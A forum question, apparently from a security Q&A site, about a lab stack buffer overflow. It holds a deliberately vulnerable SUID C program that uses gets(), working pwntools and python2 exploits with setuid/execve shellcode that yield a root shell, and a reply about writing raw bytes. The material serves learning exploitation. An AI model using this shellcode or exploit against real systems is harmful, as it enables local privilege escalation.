I am attempting to create a buffer-overflow on a simple x64 C binary without any protections (i.e. ASLR, canary, PIE, NX, Parial RelRO, Fortify). I am using an (updated) x64 Kali Linux 2020.4 distro (in vmware using the vmware image from the official offensive security website). I am compiling the program as root and I am enabling the SUID bit to access the program with root privilidges from an unpriviledged account. The code of the vulnerable program (example.c) is the following:
#include<stdio.h>
#include<string.h>
void vuln_func();
int main(int argc, char *argv[])
{
printf("Hi there!\n");
vuln_func();
}
void vuln_func()
{
char buffer[256];
gets(buffer);
}
and to compile the program I am using the following Makefile:
all:
gcc -no-pie -fno-stack-protector example.c -o example -D_FORTIFY_SOURCE=0
clean:
rm example
Using python3's pwntools to create an exploit works just fine and I get a root shell.
from pwn import *
nopsled = b"\x90"*100
shellcode = b"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = b"A"*(256-len(shellcode)-len(nopsled))
padding += b"B"*8
padding += p64(0x7fffffffdec4)
payload = nopsled + shellcode + padding
p = process("./example")
p.recv()
p.sendline(payload)
p.interactive()
but when I am using the exact same payload on python2 without using pwntools it doesn't.
import struct
nopsled = "\x90"*100
shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
padding = "A"*(256-len(shellcode)-len(nopsled))
padding += "B"*8
padding += struct.pack("Q", 0x7fffffffdec4)
payload = nopsled + shellcode + padding
print payload
and then running it using:
$(python exploit.py; cat) | ./example
The cat command "catches" the stdin but when I provide commands nothing happens.
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ $(python exploit.py ; cat) | ./example
Hi there!
whoami
id
^C
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$
What is really weird is that when adding an "\xCC" byte before the shellcode,
shellcode = "\xcc\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05"
I get a sigtrap message like that:
┌──(kali㉿kali)-[~/Desktop/boe/example]
└─$ python exploit.py | ./example
Hi there!
zsh: done python exploit.py |
zsh: trace trap ./example
Any ideas why that happens?
In my case, I faced this exact problem while using Python3. I used
sys.stdout.buffer.write()instead of theprintfunction to overcome this problem.The PoC is available on my blog on Buffer Overflows.